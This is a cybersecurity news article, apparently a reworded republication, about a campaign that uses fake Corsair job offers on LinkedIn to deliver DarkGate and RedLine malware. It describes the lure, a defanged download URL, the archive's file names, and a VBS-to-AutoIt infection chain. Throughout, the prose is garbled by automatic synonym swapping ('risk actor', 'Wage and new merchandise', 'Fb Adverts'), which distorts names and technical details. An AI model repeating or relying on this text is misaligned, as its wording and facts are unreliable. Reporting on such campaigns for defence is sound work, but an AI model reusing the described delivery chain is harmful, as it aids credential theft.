Tuesday, October 24, 2023
HomeCyber SecurityPretend Corsair job presents on LinkedIn push DarkGate malware

Pretend Corsair job presents on LinkedIn push DarkGate malware

Fake Corsair job offers on LinkedIn push DarkGate malware

A risk actor is utilizing faux LinkedIn posts and direct messages a couple of Fb Adverts specialist place at {hardware} maker Corsair to lure individuals into downloading info-stealing malware like DarkGate and RedLine.

Cybersecurity firm WithSecure detected the exercise and tracked the exercise of the group, exhibiting in a report in the present day that it’s linked to Vietnamese cybercriminal teams chargeable for the ‘Ducktail’ campaigns first noticed final yr.

These campaigns purpose to steal beneficial Fb enterprise accounts that can be utilized for malvertising or bought to different cybercriminals.

DarkGate was first noticed in 2017 however its deployment remained restricted till June 2023, when its writer determined to promote entry to the malware to a bigger viewers.

Latest examples of DarkGate’s use embody phishing assaults via Microsoft Groups that push the payload and leveraging compromised Skype accounts to ship VBS scripts to set off an an infection chain resulting in the malware.

Corsair lure

The Vietnamese risk actors focused primarily customers within the U.S., the U.Ok., and India, who maintain social media administration positions and are more likely to have entry to Fb enterprise accounts. The lure is delivered over LinkedIn and entails a job provide at Corsair. 

Targets are tricked into downloading malicious recordsdata from a URL(“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Wage and new merchandise.8.4.zip”) with a PDF or DOCX doc and a TXT file with thefollowing names:

  • Job Description of Corsair.docx
  • Wage and new merchandise.txt
  • PDF Wage and Merchandise.pdf

WithSecure researchers analyzed the metadata for the above recordsdata and located results in RedLine stealer distribution.

The downloaded archive accommodates a VBS script, presumably embedded within the DOCX file, that copies and renames ‘curl.exe’ to a brand new location and leverages it to obtain ‘autoit3.exe’ and a compiled Autoit3 script.

The executable launches the script, and the latter de-obfuscates itself and constructs DarkGate utilizing strings current within the script.

Thirty seconds after set up, the malware makes an attempt to uninstall safety merchandise from the compromised system, indicating the existence of an automatic course of.

LinkedIn launched options to battle abuse within the platform late final yr that may assist customers decide if an account is suspicious or faux. Nevertheless, it falls on the customers to test the verified data earlier than partaking in communication with a brand new account. 

WithSecure has launched a listing of indicators of compromise (IoCs) that might assist organizations defend in opposition to exercise from this risk actor. The main points embody IP addresses, domains used, URLs, file metadata, and names of archives.



Please enter your comment!
Please enter your name here

Most Popular

Recent Comments